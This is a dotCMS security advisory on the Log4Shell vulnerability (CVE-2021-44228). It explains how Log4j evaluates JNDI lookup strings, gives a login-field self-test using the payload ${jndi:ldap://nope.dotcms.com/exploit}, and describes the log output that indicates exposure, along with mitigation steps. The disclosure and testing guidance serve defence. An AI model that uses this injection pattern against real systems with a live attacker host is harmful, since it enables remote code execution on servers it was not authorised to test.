Log4j Zero-Day Exploit (CVE-2021-44228)

Issue: SI-61
Date: Dec 20, 2021, 10:15:00 AM
Severity: Critical
Requires Admin Access: No
Fix Version: 21.12 (see Mitigations for other versions)
Credit: NIST CVE
Description:

On Friday 12/10/2021, a critical vulnerability (CVE-2021-44228, widely known as "Log4Shell") was disclosed in Log4j 2, the open-source Java logging library. The flaw is that when Log4j writes a log message containing a string such as ${jndi:ldap://host/path}, it evaluates the string as a JNDI lookup and contacts the named server, so an attacker who can get such a string into any logged value (a username, a header, a form field) can have the server load attacker-controlled content, which can lead to remote code execution. Log4j is used by a very large number of organizations and products, including Apple, Microsoft, Twitter, and Amazon Web Services (for a list of affected software, see https://github.com/YfryTchsGD/Log4jAttackSurface). All recent versions of dotCMS also use Log4j, so this vulnerability has the potential to affect most dotCMS customers.

How to test if dotCMS is vulnerable
Try to log in using the native dotCMS login (not SSO) with the following string as the username:
${jndi:ldap://nope.dotcms.com/exploit}
and any password.
If the following message appears in dotcms.log or catalina.out (check both on binary installs), or in the docker logs, then the site is vulnerable: Log4j has evaluated the username as a lookup and attempted to connect to the LDAP server named in it. The attempt fails only because nope.dotcms.com does not resolve; an attacker would use a host that does.
AsyncAppender-generic WARN Error looking up JNDI resource [ldap://nope.dotcms.com/exploit]. javax.naming.CommunicationException: nope.dotcms.com:389 [Root exception is java.net.UnknownHostException: nope.dotcms.com]

The following message, by contrast, is expected and does not indicate a problem: it shows the string being logged as a literal username rather than evaluated as a lookup.
ERROR ejb.UserManagerImpl - Invalid email throwing a UserEmailAddressException: ${jndi:ldap://nope.dotcms.com/exploit}

Mitigation:

dotCMS has already created updated versions of dotCMS software and configuration to mitigate this vulnerability for all affected dotCMS versions, and has already applied mitigations for this issue to all dotCMS Cloud customers.

Please see https://github.com/dotCMS/core/issues/21393 for instructions on mitigating your own dotCMS environment. After applying the fix version or a mitigation, repeat the login test above and confirm that only the UserEmailAddressException line is logged and the "Error looking up JNDI resource" warning no longer appears.

References

Github Issue Link:
https://github.com/dotCMS/core/issues/21393